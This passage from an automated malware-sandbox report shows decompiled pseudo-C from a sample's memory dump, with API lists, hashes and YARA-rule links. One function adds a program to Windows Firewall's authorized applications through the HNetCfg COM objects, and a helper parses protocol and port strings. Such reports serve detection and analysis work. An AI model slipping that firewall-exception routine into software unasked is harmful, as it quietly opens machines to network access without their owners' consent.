                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$ByteCharErrorFromLastMultiProgWide$AllocCreateInitializeInstanceUninitialize_malloclstrlen
                                                                                                                                                • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                • API String ID: 4188526640-1951265404
                                                                                                                                                • Opcode ID: 5d13dfd9d7aab98dd388a7d56e4ddc4e6f51ebdf652a4ff2f79528e3e1c85647
                                                                                                                                                • Instruction ID: c3458ee0ff3ba32c44062dbe79f0dfd250964247d971d4e1089d11030f0e069f
                                                                                                                                                • Opcode Fuzzy Hash: 5d13dfd9d7aab98dd388a7d56e4ddc4e6f51ebdf652a4ff2f79528e3e1c85647
                                                                                                                                                • Instruction Fuzzy Hash: 68410171D0021DAFCB10EFA9C8888FEB7F9EF48310B5849A9E601F7251DA359C45CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF1683, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127comCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                			E00BF1683(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				void* _t43;
				char* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				char* _t56;
				intOrPtr* _t57;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				char* _t63;
				intOrPtr* _t64;
				char* _t65;
				intOrPtr* _t68;
				char _t83;
				signed int _t86;

				_t82 = __edx;
				_t39 =  *0xbff008; // 0xf1c81c65
				_v12 = _t39 ^ _t86;
				_t83 = 0;
				_v56 = _a4;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_t43 = E00BF80F0(__edx, "HNetCfg.FwMgr");
				_t85 = __imp__CLSIDFromProgID;
				_t44 =  *_t85(_t43,  &_v28);
				_t70 = _t44;
				if(_t44 == 0) {
					_t56 =  &_v28;
					__imp__CoCreateInstance(_t56, 0, 5, 0xbfc17c,  &_v32);
					_t70 = _t56;
					if(_t56 >= 0) {
						_t57 = _v32;
						_t82 =  &_v44;
						_t58 =  *((intOrPtr*)( *_t57 + 0x1c))(_t57,  &_v44);
						_t70 = _t58;
						if(_t58 >= 0) {
							_t59 = _v44;
							_t82 =  &_v40;
							_t60 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59,  &_v40);
							_t70 = _t60;
							if(_t60 >= 0) {
								_t63 =  *_t85(E00BF80F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t70 = _t63;
								if(_t63 >= 0) {
									_t64 = _v40;
									_t82 =  &_v36;
									_t65 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v36);
									_t70 = _t65;
									if(_t65 >= 0) {
										_v52 = 0;
										_t85 =  &_v48;
										_v48 = 0x100;
										if(E00BF1071(_v56,  &_v48,  &_v52) != 0) {
											_t68 = _v36;
											_t70 =  *((intOrPtr*)( *_t68 + 0x24))(_t68, _v52, _v48);
										}
										_t83 = 0;
									}
								}
							}
						}
					}
				}
				_t45 = _v36;
				if(_t45 != _t83) {
					 *((intOrPtr*)( *_t45 + 8))(_t45);
				}
				_t46 = _v40;
				if(_t46 != _t83) {
					 *((intOrPtr*)( *_t46 + 8))(_t46);
				}
				_t47 = _v44;
				if(_t47 != _t83) {
					 *((intOrPtr*)( *_t47 + 8))(_t47);
				}
				_t48 = _v32;
				if(_t48 != _t83) {
					 *((intOrPtr*)( *_t48 + 8))(_t48);
				}
				__imp__CoUninitialize();
				return E00BF1C57(_t70, _t70, _v12 ^ _t86, _t82, _t83, _t85);
			}

































                                                                                                                                                0x00bf1683
                                                                                                                                                0x00bf1689
                                                                                                                                                0x00bf1690
                                                                                                                                                0x00bf1699
                                                                                                                                                0x00bf169c
                                                                                                                                                0x00bf169f
                                                                                                                                                0x00bf16ae
                                                                                                                                                0x00bf16b1
                                                                                                                                                0x00bf16b4
                                                                                                                                                0x00bf16b7
                                                                                                                                                0x00bf16ba
                                                                                                                                                0x00bf16bf
                                                                                                                                                0x00bf16c6
                                                                                                                                                0x00bf16c8
                                                                                                                                                0x00bf16cc
                                                                                                                                                0x00bf16de
                                                                                                                                                0x00bf16e2
                                                                                                                                                0x00bf16e8
                                                                                                                                                0x00bf16ec
                                                                                                                                                0x00bf16f2
                                                                                                                                                0x00bf16f7
                                                                                                                                                0x00bf16fc
                                                                                                                                                0x00bf16ff
                                                                                                                                                0x00bf1703
                                                                                                                                                0x00bf1705
                                                                                                                                                0x00bf170a
                                                                                                                                                0x00bf170f
                                                                                                                                                0x00bf1712
                                                                                                                                                0x00bf1716
                                                                                                                                                0x00bf1727
                                                                                                                                                0x00bf1729
                                                                                                                                                0x00bf172d
                                                                                                                                                0x00bf172f
                                                                                                                                                0x00bf1734
                                                                                                                                                0x00bf1739
                                                                                                                                                0x00bf173c
                                                                                                                                                0x00bf1740
                                                                                                                                                0x00bf1745
                                                                                                                                                0x00bf174c
                                                                                                                                                0x00bf174f
                                                                                                                                                0x00bf175e
                                                                                                                                                0x00bf1763
                                                                                                                                                0x00bf176f
                                                                                                                                                0x00bf176f
                                                                                                                                                0x00bf1771
                                                                                                                                                0x00bf1771
                                                                                                                                                0x00bf1740
                                                                                                                                                0x00bf172d
                                                                                                                                                0x00bf1716
                                                                                                                                                0x00bf1703
                                                                                                                                                0x00bf16ec
                                                                                                                                                0x00bf1773
                                                                                                                                                0x00bf1778
                                                                                                                                                0x00bf177d
                                                                                                                                                0x00bf177d
                                                                                                                                                0x00bf1780
                                                                                                                                                0x00bf1785
                                                                                                                                                0x00bf178a
                                                                                                                                                0x00bf178a
                                                                                                                                                0x00bf178d
                                                                                                                                                0x00bf1792
                                                                                                                                                0x00bf1797
                                                                                                                                                0x00bf1797
                                                                                                                                                0x00bf179a
                                                                                                                                                0x00bf179f
                                                                                                                                                0x00bf17a4
                                                                                                                                                0x00bf17a4
                                                                                                                                                0x00bf17a7
                                                                                                                                                0x00bf17bd

                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00BF169F
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF16BA
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00BF16C6
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF16E2
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1721
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00BF1727
                                                                                                                                                  • Part of subcall function 00BF1071: __wcstoui64.LIBCMT ref: 00BF10DB
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF17A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$ByteCharConvertErrorFromLastMultiProgWide_com_util::$AllocCreateInitializeInstanceUninitialize__wcstoui64lstrlen
                                                                                                                                                • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                • API String ID: 1827900861-1951265404
                                                                                                                                                • Opcode ID: dd73e4129b9bb67cb5c225bdf3eecd6764f3537e44c7167e638fb0ba2dfc4bf8
                                                                                                                                                • Instruction ID: 693d56c5816401732ef4bf25e7746d6c38af88ff230b868b6039b62de657330f
                                                                                                                                                • Opcode Fuzzy Hash: dd73e4129b9bb67cb5c225bdf3eecd6764f3537e44c7167e638fb0ba2dfc4bf8
                                                                                                                                                • Instruction Fuzzy Hash: 5541CBB5A0020D9FCB00EFE8C888CAEBBF9EF8D710B244895E605E7251DB759D45CB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF28F4, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E00BF28F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xbfdcb8);
				E00BF3F70(__ebx, __edi, __esi);
				_t31 = E00BF339D(__ebx, __edi, _t35);
				_t15 =  *0xbff534; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00BF3C3D(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xbff438; // 0x2931658
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0xbff010;
								if(__eflags != 0) {
									_push(_t33);
									E00BF54A0(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0xbff438; // 0x2931658
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xbff438; // 0x2931658
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00BF298F();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00BF2033(_t29, _t31, 0x20);
				}
				return E00BF3FB5(_t33);
			}











                                                                                                                                                0x00bf28f4
                                                                                                                                                0x00bf28f4
                                                                                                                                                0x00bf28f4
                                                                                                                                                0x00bf28f4
                                                                                                                                                0x00bf28f6
                                                                                                                                                0x00bf28fb
                                                                                                                                                0x00bf2905
                                                                                                                                                0x00bf2907
                                                                                                                                                0x00bf290f
                                                                                                                                                0x00bf2930
                                                                                                                                                0x00bf2936
                                                                                                                                                0x00bf293a
                                                                                                                                                0x00bf293d
                                                                                                                                                0x00bf2940
                                                                                                                                                0x00bf2946
                                                                                                                                                0x00bf2948
                                                                                                                                                0x00bf294a
                                                                                                                                                0x00bf294d
                                                                                                                                                0x00bf2953
                                                                                                                                                0x00bf2955
                                                                                                                                                0x00bf2957
                                                                                                                                                0x00bf295d
                                                                                                                                                0x00bf295f
                                                                                                                                                0x00bf2960
                                                                                                                                                0x00bf2965
                                                                                                                                                0x00bf295d
                                                                                                                                                0x00bf2955
                                                                                                                                                0x00bf2966
                                                                                                                                                0x00bf296b
                                                                                                                                                0x00bf296e
                                                                                                                                                0x00bf2974
                                                                                                                                                0x00bf2978
                                                                                                                                                0x00bf2978
                                                                                                                                                0x00bf297e
                                                                                                                                                0x00bf2985
                                                                                                                                                0x00bf2917
                                                                                                                                                0x00bf2917
                                                                                                                                                0x00bf2917
                                                                                                                                                0x00bf291c
                                                                                                                                                0x00bf2920
                                                                                                                                                0x00bf2925
                                                                                                                                                0x00bf292d

                                                                                                                                                APIs
                                                                                                                                                • __getptd.LIBCMT ref: 00BF2900
                                                                                                                                                  • Part of subcall function 00BF339D: __getptd_noexit.LIBCMT ref: 00BF33A0
                                                                                                                                                  • Part of subcall function 00BF339D: __amsg_exit.LIBCMT ref: 00BF33AD
                                                                                                                                                • __amsg_exit.LIBCMT ref: 00BF2920
                                                                                                                                                • __lock.LIBCMT ref: 00BF2930
                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00BF294D
                                                                                                                                                • InterlockedIncrement.KERNEL32(02931658), ref: 00BF2978
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4271482742-0
                                                                                                                                                • Opcode ID: 7f257acc847d134b9940395161b10b9826a1badc16a2284cfd1779e3fed96fb1
                                                                                                                                                • Instruction ID: 377207f684dc4061b3fe5557ce77b656e6318d371e307ca06c5ac3be718d3221
                                                                                                                                                • Opcode Fuzzy Hash: 7f257acc847d134b9940395161b10b9826a1badc16a2284cfd1779e3fed96fb1
                                                                                                                                                • Instruction Fuzzy Hash: A001C032D0161E9BC721AF68954577EB7E0FF00B60F0040A5E614B7294CFB86E9ACBD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF54A0, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 41%
                                                                                                                                                			E00BF54A0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0xbfde48);
				_t8 = E00BF3F70(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00BF3FB5(_t8);
				}
				if( *0xc00a98 != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0xc0093c, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E00BF38CA(_t32);
						 *_t10 = E00BF3888(GetLastError());
					}
					goto L9;
				}
				E00BF3C3D(__ebx, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00BF6520(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00BF6550();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E00BF54F6();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                                                                                                                                                0x00bf54a0
                                                                                                                                                0x00bf54a2
                                                                                                                                                0x00bf54a7
                                                                                                                                                0x00bf54ac
                                                                                                                                                0x00bf54b1
                                                                                                                                                0x00bf5528
                                                                                                                                                0x00bf552d
                                                                                                                                                0x00bf552d
                                                                                                                                                0x00bf54ba
                                                                                                                                                0x00bf54ff
                                                                                                                                                0x00bf5500
                                                                                                                                                0x00bf5508
                                                                                                                                                0x00bf550e
                                                                                                                                                0x00bf5510
                                                                                                                                                0x00bf5512
                                                                                                                                                0x00bf5525
                                                                                                                                                0x00bf5527
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf5510
                                                                                                                                                0x00bf54be
                                                                                                                                                0x00bf54c4
                                                                                                                                                0x00bf54c9
                                                                                                                                                0x00bf54cf
                                                                                                                                                0x00bf54d4
                                                                                                                                                0x00bf54d6
                                                                                                                                                0x00bf54d7
                                                                                                                                                0x00bf54d8
                                                                                                                                                0x00bf54de
                                                                                                                                                0x00bf54df
                                                                                                                                                0x00bf54e6
                                                                                                                                                0x00bf54ef
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf54f1
                                                                                                                                                0x00bf54f1
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf54f1

                                                                                                                                                APIs
                                                                                                                                                • __lock.LIBCMT ref: 00BF54BE
                                                                                                                                                  • Part of subcall function 00BF3C3D: __mtinitlocknum.LIBCMT ref: 00BF3C53
                                                                                                                                                  • Part of subcall function 00BF3C3D: __amsg_exit.LIBCMT ref: 00BF3C5F
                                                                                                                                                  • Part of subcall function 00BF3C3D: EnterCriticalSection.KERNEL32(?,?,?,00BF754D,00000004,00BFDEC8,0000000C,00BF5589,00000000,?,00000000,00000000,00000000,?,00BF334F,00000001), ref: 00BF3C67
                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 00BF54C9
                                                                                                                                                • ___sbh_free_block.LIBCMT ref: 00BF54D8
                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00BFDE48,0000000C,00BF3C1E,00000000,00BFDD68,0000000C,00BF3C58,00000000,?,?,00BF754D,00000004,00BFDEC8,0000000C), ref: 00BF5508
                                                                                                                                                • GetLastError.KERNEL32(?,00BF754D,00000004,00BFDEC8,0000000C,00BF5589,00000000,?,00000000,00000000,00000000,?,00BF334F,00000001,00000214), ref: 00BF5519
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2714421763-0
                                                                                                                                                • Opcode ID: ddd96bd689ac1dd5362ddec53af5d1af993a5e8cdc2880a1d0212c300eec9793
                                                                                                                                                • Instruction ID: 020ee481a744e22f8351e5f292aefc313cc7a7ccc3c04e59f9e6372474b07c35
                                                                                                                                                • Opcode Fuzzy Hash: ddd96bd689ac1dd5362ddec53af5d1af993a5e8cdc2880a1d0212c300eec9793
                                                                                                                                                • Instruction Fuzzy Hash: E0014F7190170EAADB306BB49C0A77E7AE5DF10761F254089F704AB195DE388A8C8B95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF1071, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00BF1071(void* __edi, intOrPtr* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				void* _t25;

				_t25 = __edi;
				if(E00BF1C70(__edi, "udp") == 0) {
					if(E00BF1C70(__edi, "tcp") == 0) {
						if(E00BF1C70(__edi, "any") == 0) {
							goto L9;
						} else {
							 *__esi = 0x100;
							goto L6;
						}
					} else {
						 *__esi = 6;
						goto L6;
					}
				} else {
					 *__esi = 0x11;
					L6:
					if(E00BF1C70(_t25, ":") == 0) {
						L9:
						return 0;
					} else {
						_v8 = _v8 & 0x00000000;
						_t11 = E00BF1FD7(_t9 + 1,  &_v8, 0xa);
						if(_t11 == 0) {
							goto L9;
						} else {
							 *_a4 = _t11;
							return 1;
						}
					}
				}
			}






                                                                                                                                                0x00bf1071
                                                                                                                                                0x00bf1084
                                                                                                                                                0x00bf109d
                                                                                                                                                0x00bf10b6
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf10b8
                                                                                                                                                0x00bf10b8
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf10b8
                                                                                                                                                0x00bf109f
                                                                                                                                                0x00bf109f
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf109f
                                                                                                                                                0x00bf1086
                                                                                                                                                0x00bf1086
                                                                                                                                                0x00bf10be
                                                                                                                                                0x00bf10cd
                                                                                                                                                0x00bf10f1
                                                                                                                                                0x00bf10f4
                                                                                                                                                0x00bf10cf
                                                                                                                                                0x00bf10cf
                                                                                                                                                0x00bf10db
                                                                                                                                                0x00bf10e5
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf10e7
                                                                                                                                                0x00bf10ea
                                                                                                                                                0x00bf10f0
                                                                                                                                                0x00bf10f0
                                                                                                                                                0x00bf10e5
                                                                                                                                                0x00bf10cd

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __wcstoui64
                                                                                                                                                • String ID: any$tcp$udp
                                                                                                                                                • API String ID: 3882282163-1470427579
                                                                                                                                                • Opcode ID: dd217fa96ce737ec27b6730317dd75762e12e4a7aa65c9e6838d23ba6b771f6e
                                                                                                                                                • Instruction ID: 6d166fa4ad4b2d5657c7fad0001ce0405426ac02f3ba6cdbd5651d2b6d7df68d
                                                                                                                                                • Opcode Fuzzy Hash: dd217fa96ce737ec27b6730317dd75762e12e4a7aa65c9e6838d23ba6b771f6e
                                                                                                                                                • Instruction Fuzzy Hash: 4E01217264834EE5E714AA389D02B3662D9CB02764F200D9DEB41DB0D1EFB6D8C89629
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF9110, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 65%
                                                                                                                                                			E00BF9110() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0xbfd320;
					_v28 =  *0xbfd318;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                0x00bf9115
                                                                                                                                                0x00bf911d
                                                                                                                                                0x00bf9134
                                                                                                                                                0x00bf90e0
                                                                                                                                                0x00bf90e9
                                                                                                                                                0x00bf90f5
                                                                                                                                                0x00bf90f8
                                                                                                                                                0x00bf90fb
                                                                                                                                                0x00bf90fd
                                                                                                                                                0x00bf9100
                                                                                                                                                0x00bf9105
                                                                                                                                                0x00bf910f
                                                                                                                                                0x00bf9107
                                                                                                                                                0x00bf910b
                                                                                                                                                0x00bf910b
                                                                                                                                                0x00bf911f
                                                                                                                                                0x00bf9125
                                                                                                                                                0x00bf912d
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf912f
                                                                                                                                                0x00bf912f
                                                                                                                                                0x00bf9133
                                                                                                                                                0x00bf9133
                                                                                                                                                0x00bf912d

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,00BF84A4), ref: 00BF9115
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00BF9125
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                                                • Opcode ID: 6f2bf5da45ab28bd8cf5e455b0113c5c6ab541350d92815fa03b746209893baa
                                                                                                                                                • Instruction ID: d36629f0165a3cf56a5ea71a092588f1268532ab3ac9db3c5fffe2f182eff36e
                                                                                                                                                • Opcode Fuzzy Hash: 6f2bf5da45ab28bd8cf5e455b0113c5c6ab541350d92815fa03b746209893baa
                                                                                                                                                • Instruction Fuzzy Hash: 55F01D20A00A0EE2DB101BB5AD0E67EBAB9EB80746F8205D09391F20D4DE7081B9D246
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF8FFC, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00BF8FFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00BF88ED(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00BF89DD(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00BF8F02(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00BF8E47(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                                0x00bf9001
                                                                                                                                                0x00bf9007
                                                                                                                                                0x00bf907a
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf900e
                                                                                                                                                0x00bf900e
                                                                                                                                                0x00bf9011
                                                                                                                                                0x00bf902c
                                                                                                                                                0x00bf902f
                                                                                                                                                0x00bf904f
                                                                                                                                                0x00bf9061
                                                                                                                                                0x00bf9031
                                                                                                                                                0x00bf9031
                                                                                                                                                0x00bf9034
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf9036
                                                                                                                                                0x00bf9048
                                                                                                                                                0x00bf9048
                                                                                                                                                0x00bf9034
                                                                                                                                                0x00bf907f
                                                                                                                                                0x00bf9083
                                                                                                                                                0x00bf9013
                                                                                                                                                0x00bf902b
                                                                                                                                                0x00bf902b
                                                                                                                                                0x00bf9011

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3016257755-0
                                                                                                                                                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                • Instruction ID: 4b33e7abf9f6fa1aeb2f99c958768662fcee57d6c8353dff42dcbaaa31e74cb1
